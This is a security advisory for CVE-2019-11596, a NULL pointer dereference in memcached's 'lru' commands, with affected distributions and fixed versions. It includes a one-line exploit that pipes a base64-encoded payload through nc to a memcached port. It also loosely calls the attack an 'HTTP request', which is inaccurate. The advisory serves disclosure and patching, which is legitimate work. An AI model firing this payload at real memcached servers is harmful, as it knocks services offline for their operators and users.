NULL pointer dereference in memcached - CVE-2019-11596
Published: April 29, 2019
Vulnerability details
The vulnerability allows a remote attacker to perform a denial of service (DoS) attack.
The vulnerability exists due to a NULL pointer dreference error in the "lru mode" and "lru temp_ttl" commands when parsing specially crafted lru command messages passed passed to process_lru_command() function in memcached.c. A remote attacker can send a specially crafted HTTP request to the affected application and perform denial of service (DoS) attack.
Exploitation example:
echo -n "bHJ1IG1vZGUKb7G0AGxydWRl6gdtTk9UXw==" | base64 -d | nc 127.0.0.1 11211
Affected software
memcached (Ubuntu package)
memcached (Red Hat package)
memcached
Red Hat Enterprise Linux for x86_64
Red Hat Enterprise Linux for IBM z Systems
Red Hat Enterprise Linux for Power, little endian
Red Hat Enterprise Linux for ARM 64
Opensuse
Fedora
Red Hat OpenStack
Red Hat OpenStack for IBM Power
How to mitigate CVE-2019-11596
memcached (Ubuntu package) - addressed in versions 1.5.6-0ubuntu1.1, 1.5.10-0ubuntu1.18.10.1, 1.5.10-0ubuntu1.19.04.1
memcached (Red Hat package) - addressed in versions 1.4.39-3.el7ost, 1.5.9-3.el8
memcached - addressed in versions 1.5.14-1.fc29, 1.5.14-1.fc30